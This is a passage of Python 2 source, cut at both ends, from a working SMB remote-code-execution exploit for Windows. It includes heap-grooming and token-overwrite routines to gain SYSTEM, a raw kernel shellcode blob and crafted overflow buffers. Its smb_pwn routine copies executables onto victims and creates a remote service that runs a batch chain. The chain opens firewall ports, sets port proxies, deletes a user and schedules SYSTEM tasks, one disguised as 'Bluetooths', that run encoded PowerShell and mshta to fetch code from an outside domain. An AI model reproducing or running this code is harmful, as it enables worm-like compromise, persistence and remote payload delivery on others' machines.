conn.send_trans_secondary(mid=info['fid'], data='\\x00', dataDisplacement=NEXT_TRANS_OFFSET + tinfo['TRANS_MID_OFFSET'])        wait_for_request_processed(conn)        recvPkt = conn.send_nt_trans(5, mid=special_mid, param=trans_param, data='')        if recvPkt.getNTStatus() == 65538:            print 'success controlling one transaction'            success = True            if 'arch' not in info:                print 'Target is ' + tinfo['ARCH']                info['arch'] = tinfo['ARCH']                info.update(OS_ARCH_INFO[info['os']][info['arch']])            break        if recvPkt.getNTStatus() != 0:            print ('unexpected return status: 0x{:x}').format(recvPkt.getNTStatus())    if not success:        print ('unexpected return status: 0x{:x}').format(recvPkt.getNTStatus())        print '!!! Write to wrong place !!!'        print 'the target might be crashed'        return False    print 'modify parameter count to 0xffffffff to be able to write backward'    conn.send_trans_secondary(mid=info['fid'], data='\\xff\\xff\\xff\\xff', dataDisplacement=NEXT_TRANS_OFFSET + info['TRANS_TOTALPARAMCNT_OFFSET'])    if info['arch'] == 'x64':        conn.send_trans_secondary(mid=info['fid'], data='\\xff\\xff\\xff\\xff', dataDisplacement=NEXT_TRANS_OFFSET + info['TRANS_INPARAM_OFFSET'] + 4)    wait_for_request_processed(conn)    TRANS_CHUNK_SIZE = HEAP_HDR_SIZE + info['TRANS_SIZE'] + 4096 + HEAP_CHUNK_PAD_SIZE    PREV_TRANS_DISPLACEMENT = TRANS_CHUNK_SIZE + info['TRANS_SIZE'] + TRANS_NAME_LEN    PREV_TRANS_OFFSET = 4294967296L - PREV_TRANS_DISPLACEMENT    conn.send_nt_trans_secondary(mid=special_mid, param='\\xff\\xff\\xff\\xff', paramDisplacement=PREV_TRANS_OFFSET + info['TRANS_TOTALPARAMCNT_OFFSET'])    if info['arch'] == 'x64':        conn.send_nt_trans_secondary(mid=special_mid, param='\\xff\\xff\\xff\\xff', paramDisplacement=PREV_TRANS_OFFSET + info['TRANS_INPARAM_OFFSET'] + 4)        conn.send_trans_secondary(mid=info['fid'], data='\\x00\\x00\\x00\\x00', dataDisplacement=NEXT_TRANS_OFFSET + info['TRANS_INPARAM_OFFSET'] + 4)    wait_for_request_processed(conn)    print 'leak next transaction'    conn.send_trans_secondary(mid=info['fid'], data='\\x05', dataDisplacement=NEXT_TRANS_OFFSET + info['TRANS_FUNCTION_OFFSET'])    conn.send_trans_secondary(mid=info['fid'], data=pack('<IIIII', 4, 4, 4, 256, 256), dataDisplacement=NEXT_TRANS_OFFSET + info['TRANS_PARAMCNT_OFFSET'])    conn.send_nt_trans_secondary(mid=special_mid)    leakData = conn.recv_transaction_data(special_mid, 256)    leakData = leakData[4:]    if unpack_from('<H', leakData, HEAP_CHUNK_PAD_SIZE)[0] != TRANS_CHUNK_SIZE // info['POOL_ALIGN']:        print 'chunk size is wrong'        return False    leakTranOffset = HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE    leakTrans = leakData[leakTranOffset:]    fmt = info['PTR_FMT']    _, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<' + fmt * 5, leakTrans, 8)    inparam_value, outparam_value, indata_value = unpack_from('<' + fmt * 3, leakTrans, info['TRANS_INPARAM_OFFSET'])    trans2_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]    print ('CONNECTION: 0x{:x}').format(connection_addr)    print ('SESSION: 0x{:x}').format(session_addr)    print ('FLINK: 0x{:x}').format(flink_value)    print ('InData: 0x{:x}').format(indata_value)    print ('MID: 0x{:x}').format(trans2_mid)    trans2_addr = inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN    trans1_addr = trans2_addr - TRANS_CHUNK_SIZE * 2    print ('TRANS1: 0x{:x}').format(trans1_addr)    print ('TRANS2: 0x{:x}').format(trans2_addr)    print 'modify transaction struct for arbitrary read/write'    TRANS_OFFSET = 4294967296L - (info['TRANS_SIZE'] + TRANS_NAME_LEN)    conn.send_nt_trans_secondary(mid=info['fid'], param=pack('<' + fmt * 3, trans1_addr, trans1_addr + 512, trans2_addr), paramDisplacement=TRANS_OFFSET + info['TRANS_INPARAM_OFFSET'])    wait_for_request_processed(conn)    trans1_mid = conn.next_mid()    conn.send_trans_secondary(mid=info['fid'], param=pack('<H', trans1_mid), paramDisplacement=info['TRANS_MID_OFFSET'])    wait_for_request_processed(conn)    info.update({'connection': connection_addr, 'session': session_addr, 'trans1_mid': trans1_mid, 'trans1_addr': trans1_addr, 'trans2_mid': trans2_mid, 'trans2_addr': trans2_addr})    return Truedef create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr):    SID_SYSTEM = pack('<BB5xBI', 1, 1, 5, 18)    SID_ADMINISTRATORS = pack('<BB5xBII', 1, 2, 5, 32, 544)    SID_AUTHENICATED_USERS = pack('<BB5xBI', 1, 1, 5, 11)    SID_EVERYONE = pack('<BB5xBI', 1, 1, 1, 0)    sids = [SID_SYSTEM, SID_ADMINISTRATORS, SID_EVERYONE, SID_AUTHENICATED_USERS]    attrs = [0, 14, 7, 7]    fakeUserAndGroupCount = min(userAndGroupCount, 4)    fakeUserAndGroupsAddr = userAndGroupsAddr    addr = fakeUserAndGroupsAddr + fakeUserAndGroupCount * info['PTR_SIZE'] * 2    fakeUserAndGroups = ''    for sid, attr in zip(sids[:fakeUserAndGroupCount], attrs[:fakeUserAndGroupCount]):        fakeUserAndGroups += pack('<' + info['PTR_FMT'] * 2, addr, attr)        addr += len(sid)    fakeUserAndGroups += ('').join(sids[:fakeUserAndGroupCount])    return (fakeUserAndGroupCount, fakeUserAndGroups)def exploit(target, pipe_name, USERNAME, PASSWORD, tg):    conn = MYSMB(target)    conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)    info = {}    conn.login(USERNAME, PASSWORD, maxBufferSize=4356)    server_os = conn.get_server_os()    print 'Target OS: ' + server_os    if server_os.startswith('Windows 7 ') or server_os.startswith('Windows Server 2008 R2'):        info['os'] = 'WIN7'        info['method'] = exploit_matched_pairs    elif server_os.startswith('Windows 8') or server_os.startswith('Windows Server 2012 ') or server_os.startswith('Windows Server 2016 ') or server_os.startswith('Windows 10') or server_os.startswith('Windows RT 9200'):        info['os'] = 'WIN8'        info['method'] = exploit_matched_pairs    elif server_os.startswith('Windows Server (R) 2008') or server_os.startswith('Windows Vista'):        info['os'] = 'WIN7'        info['method'] = exploit_fish_barrel    elif server_os.startswith('Windows Server 2003 '):        info['os'] = 'WIN2K3'        info['method'] = exploit_fish_barrel    elif server_os.startswith('Windows 5.1'):        info['os'] = 'WINXP'        info['arch'] = 'x86'        info['method'] = exploit_fish_barrel    elif server_os.startswith('Windows XP '):        info['os'] = 'WINXP'        info['arch'] = 'x64'        info['method'] = exploit_fish_barrel    elif server_os.startswith('Windows 5.0'):        info['os'] = 'WIN2K'        info['arch'] = 'x86'        info['method'] = exploit_fish_barrel    else:        print 'This exploit does not support this target'    if pipe_name is None:        pipe_name = find_named_pipe(conn)        if pipe_name is None:            print 'Not found accessible named pipe'            return False        print 'Using named pipe: ' + pipe_name    if not info['method'](conn, pipe_name, info):        return False    fmt = info['PTR_FMT']    print 'make this SMB session to be SYSTEM'    write_data(conn, info, info['session'] + info['SESSION_ISNULL_OFFSET'], '\\x00\\x01')    sessionData = read_data(conn, info, info['session'], 256)    secCtxAddr = unpack_from('<' + fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]    if 'PCTXTHANDLE_TOKEN_OFFSET' in info:        if 'SECCTX_PCTXTHANDLE_OFFSET' in info:            pctxtDataInfo = read_data(conn, info, secCtxAddr + info['SECCTX_PCTXTHANDLE_OFFSET'], 8)            pctxtDataAddr = unpack_from('<' + fmt, pctxtDataInfo)[0]        else:            pctxtDataAddr = secCtxAddr        tokenAddrInfo = read_data(conn, info, pctxtDataAddr + info['PCTXTHANDLE_TOKEN_OFFSET'], 8)        tokenAddr = unpack_from('<' + fmt, tokenAddrInfo)[0]        print ('current TOKEN addr: 0x{:x}').format(tokenAddr)        tokenData = read_data(conn, info, tokenAddr, 64 * info['PTR_SIZE'])        userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset = get_group_data_from_token(info, tokenData)        print 'overwriting token UserAndGroups'        fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)        if fakeUserAndGroupCount != userAndGroupCount:            write_data(conn, info, tokenAddr + userAndGroupCountOffset, pack('<I', fakeUserAndGroupCount))        write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)    else:        secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])        print 'overwriting session security context'        write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])    try:        smb_pwn(conn, info['arch'], tg)    except:        pass    if 'PCTXTHANDLE_TOKEN_OFFSET' in info:        userAndGroupsOffset = userAndGroupsAddr - tokenAddr        write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset + len(fakeUserAndGroups)])        if fakeUserAndGroupCount != userAndGroupCount:            write_data(conn, info, tokenAddr + userAndGroupCountOffset, pack('<I', userAndGroupCount))    else:        write_data(conn, info, secCtxAddr, secCtxData)    conn.disconnect_tree(conn.get_tid())    conn.logoff()    conn.get_socket().close()    time.sleep(2)    return Truedef validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset):    userAndGroupCount, RestrictedSidCount = unpack_from('<II', tokenData, userAndGroupCountOffset)    userAndGroupsAddr, RestrictedSids = unpack_from('<' + info['PTR_FMT'] * 2, tokenData, userAndGroupsAddrOffset)    success = True    if RestrictedSidCount != 0 or RestrictedSids != 0 or userAndGroupCount == 0 or userAndGroupsAddr == 0:        print 'Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!'        print ('RestrictedSids: 0x{:x}').format(RestrictedSids)        print ('RestrictedSidCount: 0x{:x}').format(RestrictedSidCount)        success = False    print ('userAndGroupCount: 0x{:x}').format(userAndGroupCount)    print ('userAndGroupsAddr: 0x{:x}').format(userAndGroupsAddr)    return (success, userAndGroupCount, userAndGroupsAddr)def get_group_data_from_token(info, tokenData):    userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET']    userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET']    success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset)    if not success and info['os'] == 'WINXP' and info['arch'] == 'x86':        print 'Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround'        userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']        userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']        success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset)    if not success:        print 'Bad TOKEN_USER_GROUP offsets. Abort > BSOD'    return (     userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset)def smb_pwn(conn, arch, tg):    ee = ''    eb = 'c:\\\\windows\\\\system32\\\\calc.exe'    smbConn = conn.get_smbconnection()    if os.path.exists('c:/windows/system32/svhost.exe'):        eb = 'c:\\\\windows\\\\system32\\\\svhost.exe'    if os.path.exists('c:/windows/SysWOW64/svhost.exe'):        eb = 'c:\\\\windows\\\\SysWOW64\\\\svhost.exe'    if os.path.exists('c:/windows/system32/drivers/svchost.exe'):        eb = 'c:\\\\windows\\\\system32\\\\drivers\\\\svchost.exe'    if os.path.exists('c:/windows/SysWOW64/drivers/svchost.exe'):        eb = 'c:\\\\windows\\\\SysWOW64\\\\drivers\\\\svchost.exe'    service_exec(conn, 'cmd /c net share c$=c:')    if tg == 2:        smb_send_file(smbConn, eb, 'c', '/installed2.exe')    else:        smb_send_file(smbConn, eb, 'c', '/installed.exe')    if os.path.exists('c:/windows/temp/svvhost.exe'):        ee = 'c:\\\\windows\\\\temp\\\\svvhost.exe'    if os.path.exists('c:/windows/temp/svchost.exe'):        ee = 'c:\\\\windows\\\\temp\\\\svchost.exe'    if '.exe' in ee:        smb_send_file(smbConn, ee, 'c', '/windows/temp/svchost.exe')    else:        print 'no eb**************************'    if tg == 2:        bat = 'cmd /c c:\\\\installed2.exe&c:\\\\installed2.exe&echo c:\\\\installed2.exe >c:/windows/temp/p.bat&echo c:\\\\windows\\\\temp\\\\svchost.exe >>c:/windows/temp/p.bat&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn \"\\\\Microsoft\\\\windows\\\\Bluetooths\" /tr \"powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=\" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr \"cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%\"^&schtasks /run /TN Autocheck^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f  %%i in (\\'tasklist ^^^| find /c /i \"cmd.exe\"\\'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo net user k8h3d /del >>c:/windows/temp/p.bat&echo del c:\\\\windows\\\\temp\\\\p.bat>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat'    else:        bat = 'cmd /c c:\\\\installed.exe&c:\\\\installed.exe&echo c:\\\\installed.exe >c:/windows/temp/p.bat&echo c:\\\\windows\\\\temp\\\\svchost.exe >>c:/windows/temp/p.bat&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn \"\\\\Microsoft\\\\windows\\\\Bluetooths\" /tr \"powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=\" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr \"cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%\"^&schtasks /run /TN Autocheck^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f  %%i in (\\'tasklist ^^^| find /c /i \"cmd.exe\"\\'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo net user k8h3d /del >>c:/windows/temp/p.bat&echo del c:\\\\windows\\\\temp\\\\p.bat>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat'    service_exec(conn, bat)def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):    with open(localSrc, 'rb') as fp:        smbConn.putFile(remoteDrive + '$', remotePath, fp.read)def service_exec(conn, cmd):    import random    random.choice = random.choice    random.randint = random.randint    import string    from impacket.dcerpc.v5 import transport, srvs, scmr    service_name = ('').join([random.choice(string.letters) for i in range(4)])    rpcsvc = conn.get_dce_rpc('svcctl')    rpcsvc.connect()    rpcsvc.bind(scmr.MSRPC_UUID_SCMR)    svcHandle = None    try:        try:            print 'Opening SVCManager on %s.....' % conn.get_remote_host()            resp = scmr.hROpenSCManagerW(rpcsvc)            svcHandle = resp['lpScHandle']            try:                resp = scmr.hROpenServiceW(rpcsvc, svcHandle, service_name + '\\x00')            except Exception as e:                if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') == -1:                    raise e            else:                scmr.hRDeleteService(rpcsvc, resp['lpServiceHandle'])                scmr.hRCloseServiceHandle(rpcsvc, resp['lpServiceHandle'])            print 'Creating service %s.....' % service_name            resp = scmr.hRCreateServiceW(rpcsvc, svcHandle, service_name + '\\x00', service_name + '\\x00', lpBinaryPathName=cmd + '\\x00')            serviceHandle = resp['lpServiceHandle']            if serviceHandle:                try:                    print 'Starting service %s.....' % service_name                    scmr.hRStartServiceW(rpcsvc, serviceHandle)                    time.sleep(2)                    print 'Stoping service %s.....' % service_name                    scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP)                    time.sleep(2)                except Exception as e:                    print str(e)                print 'Removing service %s.....' % service_name                scmr.hRDeleteService(rpcsvc, serviceHandle)                scmr.hRCloseServiceHandle(rpcsvc, serviceHandle)        except Exception as e:            print 'ServiceExec Error on: %s' % conn.get_remote_host()            print str(e)    finally:        if svcHandle:            scmr.hRCloseServiceHandle(rpcsvc, svcHandle)    rpcsvc.disconnect()scode = '31c0400f84be03000060e8000000005be823000000b9760100000f328d7b3c39f87411394500740689450089550889f831d20f3061c224008dab00100000c1ed0cc1e50c81ed50000000c3b92300000068300000000fa18ed98ec1648b0d400000008b6104519c60e8000000005be8c5ffffff8b450005170000008944242431c09942f00fb055087512b976010000998b45000f30fbe804000000fa619dc38b4500c1e80cc1e00c2d001000006681384d5a75f4894504b8787cf4dbe8e100000097b83f5f647757e8d500000029f889c13d70010000750505080000008d581c8d341f64a1240100008b3689f229c281fa0004000077f252b8e1140117e8a70000008b400a8d50048d340fe8d70000003d5a6afac174113dd883e03e740a8b3c1729d7e9e0ffffff897d0c8d1c1f8d75105f8b5b04b83e4cf8cee86a0000008b400a3ca077022c0829f8817c03fc0000000074de31c05568010000005550e800000000810424950000005053293c2456b8c45c196de82800000031c050505056b83446ccafe81800000085c074a48b451c80780e01740a8900894004e991ffffffc3e802000000ffe0608b6d04978b453c8b54057801ea8b4a188b5a2001eb498b348b01eee81d00000039f875f18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c35231c099acc1ca0d01c285c075f6925ac358894424105859585a6052518b2831c064a22400000099b04050c1e0065054528911514a52b8ea996e57e87bffffff85c07553588b38e8000000005e81c659000000b900040000f3a48b450c50b848b818b8e853ffffff8b400c8b40148b0066817824180075f68b5028817a0c3300320075ea8b5810895d04b85e515e83e82effffff59890131c08845084064a22400000061c35a585859515151e8000000008104240c000000515152ffe0dadeba67042d06d97424f45d31c9b14383c504315513033217cff340ff8dfcb800f2755d3132e1166282617a8f69276e041fe081adaad6ac2e862bafacd57f0f8c15724ec9487f028207d2b2a752ef39fb7377de4c755671c62c78700b45316a48608b01ba1e0ac3f2dfa12a3b12bb6bfccdce85fe70c9527caf5c402624c6acd6e99127d446d56ff9593a0405d1bdca8fa199ced4728357b1d5bc871a8918ccb7de108fdd21a6aa9022b8b4844a893f4b0c16ea2ff2f43e5a9ba0abe7c652062bffd0a2d404c8c7d1414e34a8da3b3a1fda6959f240b2b26fa9dca91b89554281bbb5cf7154856ba2cfd11791651b84bf1f081d60cfcf0504297ea0b01512455a3786feeed823702f46a81d46e659aeec84f824621b88e417e306d78333f87628500655e82e000000b9820000c00f324c8d0d370000004439c87419394500740a895504894500c645f8004991505a48c1ea200f305dc3488d2d0010000048c1ed0c48c1e50c4881ed70000000c30f01f865488924251000000065488b2425a8010000682b00000065ff342510000000505055e8bfffffff488b450048051f00000048894424105152415041514152415331c0b201f00fb055f87514b9820000c08b45008b55040f30fbe80e000000fa415b415a415941585a595d58c341574156575653504c8b7d0049c1ef0c49c1e70c4981ef001000006641813f4d5a75f14c897d08654c8b342588010000bf787cf4dbe8180100004891bf3f5f6477e8130100008b400389c33d0004000072050510000000488d50284c8d04114d89c14d8b094d39c80f84db0000004c89c84c29f0483d0007000077e64d29cebfe1140117e8d00000008b780381c708000000488d3419e8060100003d5a6afac174133dd883e03e740c488b0c394829f9e9ddffffffbf48b818b8e893000000488945f0488d34114889f3488b5b084839de74f74a8d1433bf3e4cf8cee8780000008b400348817c02f80000000074db488d4d104d31c04c8d0db50000005568010000005541504881ec20000000bfc45c196de83b000000488d4d104d31c9bf3446ccafe82a0000004881c44000000085c07497488b452080781a01740c48890048894008e981ffffff585b5e5f415e415fc3e802000000ffe0535156418b473c418b8407880000004c01f8508b48188b58204c01fbffc98b348b4c01fee81f00000039f875ef588b58244c01fb668b0c4b8b581c4c01fb8b048b4c01f85e595bc35231c099acc1ca0d01c285c075f6925ac3555357564157498b284c8b7d08525e4c89cb31c0440f22c048890289c148f7d14989c0b04050c1e006504989014881ec20000000bfea996e57e862ffffff4881c43000000085c07546488b3e488d354e000000b900060000f3a4488b45f0488b4018488b4020488b0066817848180075f5488b5050817a0c3300320075e84c8b7820bf5e515e83e81bffffff48890331c9884df8b101440f22c1415f5e5f5b5dc3489231c951514989c94c8d051300000089ca4881ec20000000ffd04881c430000000c3dac4d97424f4be15624e335f33c9b15731771a83c704037716e2e09e06b0eeaf7f76ee4f8036bf0ed0ea6ec7983b428250b7302d294ce6b5e1d954e6b9562ab671667d7cc835b04884f472e629960ef57d78af38b4756eba86649dee49381584189a2ed8a092310d53a2b9ad64a3f128a4d7667b24c838f06ef0fc8d2f20b5907fc313db80cdda504a469467651b15a1c195959d9314dcd352961fd3b4ed6e683642b4797d63650ca5cbc16415c8807b467653f76a3f178c33a3de93639a6b970b556a484a3e2d3013e7f781f3565e435e11e3af7ee0b1d09fba74763a73fd9a53d4fe645c864821a2394855a5394855edb4c554ecc6d51754f75ef82f07b5bcd0e51fc951acf958ec4dfab647edc01164f7b46b140ca419114863f16bc101f5d25c5c2f1b8b3dbd8014ee5e693b95d449b62670f818a342946b57930fb4f3e0a5fda86c5cad79518f30e1f5e9dc8c81d54c210977e1dabf188c5460860af90926ba72bec45d00515bedc8c6a3793b7df4565a1990a8'sc = binascii.unhexlify(scode)NTFEA_SIZE = 69632ntfea10000 = pack('<BBH', 0, 0, 65501) + 'A' * 65502ntfea11000 = (pack('<BBH', 0, 0, 0) + '\\x00') * 600ntfea11000 += pack('<BBH', 0, 0, 62397) + 'A' * 62398ntfea1f000 = (pack('<BBH', 0, 0, 0) + '\\x00') * 9364ntfea1f000 += pack('<BBH', 0, 0, 18669) + 'A' * 18670ntfea = {65536: ntfea10000, 69632: ntfea11000}TARGET_HAL_HEAP_ADDR_x64 = 18446744073706405904LTARGET_HAL_HEAP_ADDR_x86 = 4292866048LfakeSrvNetBufferNsa = pack('<II', 69632, 0) * 2fakeSrvNetBufferNsa += pack('<HHI', 65535, 0, 0) * 2fakeSrvNetBufferNsa += '\\x00' * 16fakeSrvNetBufferNsa += pack('<IIII', TARGET_HAL_HEAP_ADDR_x86 + 256, 0, 0, TARGET_HAL_HEAP_ADDR_x86 + 32)fakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86 + 256, 0, 96, 4100, 0)fakeSrvNetBufferNsa += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86 - 128, 0, TARGET_HAL_HEAP_ADDR_x64)fakeSrvNetBufferNsa += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64 + 256, 0)fakeSrvNetBufferNsa += pack('<QHHI', 0, 96, 4100, 0)fakeSrvNetBufferNsa += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64 - 128)fakeSrvNetBufferX64 = pack('<II', 69632, 0) * 2fakeSrvNetBufferX64 += pack('<HHIQ', 65535, 0, 0, 0)fakeSrvNetBufferX64 += '\\x00' * 16fakeSrvNetBufferX64 += '\\x00' * 16fakeSrvNetBufferX64 += '\\x00' * 16fakeSrvNetBufferX64 += pack('<IIQ', 0, 0, TARGET_HAL_HEAP_ADDR_x64)fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64 + 256, 0)fakeSrvNetBufferX64 += pack('<QHHI', 0, 96, 4100, 0)fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64 - 128)fakeSrvNetBuffer = fakeSrvNetBufferNsafeaList = pack('<I', 65536)feaList += ntfea[NTFEA_SIZE]feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuffer) - 1) + fakeSrvNetBufferfeaList += pack('<BBH', 18, 52, 22136)fake_recv_struct = pack('<QII', 0, 3, 0)fake_recv_struct += '\\x00' * 16fake_recv_struct += pack('<QII', 0, 3, 0)fake_recv_struct += '\\x00' * 16 * 7fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64 + 160, TARGET_HAL_HEAP_ADDR_x64 + 160)fake_recv_struct += '\\x00' * 16fake_recv_struct += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86 + 192, TARGET_HAL_HEAP_ADDR_x86 + 192, 0)fake_recv_struct += '\\x00' * 16 * 11fake_recv_struct += pack('<QII', 0, 0, TARGET_HAL_HEAP_ADDR_x86 + 400)fake_recv_struct += pack('<IIQ', 0, TARGET_HAL_HEAP_ADDR_x86 + 496 - 1, 0)fake_recv_struct += '\\x00' * 16 * 3fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64 + 480)fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64 + 496 - 1)def getNTStatus(self):    return self['ErrorCode'] << 16 | self['_reserved'] << 8 | self['ErrorClass']setattr(smb.NewSMBPacket, 'getNTStatus', getNTStatus)def sendEcho(conn, tid, data):    pkt = smb.NewSMBPacket()    pkt['Tid'] = tid    transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)    transCommand['Parameters'] = smb.SMBEcho_Parameters()    transCommand['Data'] = smb.SMBEcho_Data()    transCommand['Parameters']['EchoCount'] = 1    transCommand['Data']['Data'] = data    pkt.addCommand(transCommand)    conn.sendSMB(pkt)    recvPkt = conn.recvSMB()    if recvPkt.getNTStatus() == 0:        print 'got good ECHO response'    else:        print ('got bad ECHO response: 0x{:x}').format(recvPkt.getNTStatus())def createSessionAllocNonPaged(target, size):    conn = smb.SMB(target, target)    _, flags2 = conn.get_flags()    flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY    if size >= 65535:        flags2 &= ~smb.SMB.FLAGS2_UNICODE        reqSize = size // 2    else:        flags2 |= smb.SMB.FLAGS2_UNICODE        reqSize = size    conn.set_flags(flags2=flags2)    pkt = smb.NewSMBPacket()    sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)    sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()    sessionSetup['Parameters']['MaxBufferSize'] = 61440    sessionSetup['Parameters']['MaxMpxCount'] = 2    sessionSetup['Parameters']['VcNumber'] = 2    sessionSetup['Parameters']['SessionKey'] = 0    sessionSetup['Parameters']['SecurityBlobLength'] = 0    sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY    sessionSetup['Data'] = pack('<H', reqSize) + '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'    pkt.addCommand(sessionSetup)    conn.sendSMB(pkt)    recvPkt = conn.recvSMB()    if recvPkt.getNTStatus() == 0:        print 'SMB1 session setup allocate nonpaged pool success'    else:        print 'SMB1 session setup allocate nonpaged pool failed'    return connclass SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):    structure = (     ('TotalParameterCount', '<H=0'), ('TotalDataCount', '<H'), ('ParameterCount', '<H=0'), ('ParameterOffset', '<H=0'), ('ParameterDisplacement', '<H=0'), ('DataCount', '<H'), ('DataOffset', '<H'), ('DataDisplacement', '<H=0'), ('FID', '<H=0'))def send_trans2_second(conn, tid, data, displacement):    pkt = smb.NewSMBPacket()    pkt['Tid'] = tid    transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)    transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()    transCommand['Data'] = smb.SMBTransaction2Secondary_Data()    transCommand['Parameters']['TotalParameterCount'] = 0    transCommand['Parameters']['TotalDataCount'] = len(data)    fixedOffset = 53    transCommand['Data']['Pad1'] = ''    transCommand['Parameters']['ParameterCount'] = 0    transCommand['Parameters']['ParameterOffset'] = 0    if len(data) > 0:        pad2Len = (4 - fixedOffset % 4) 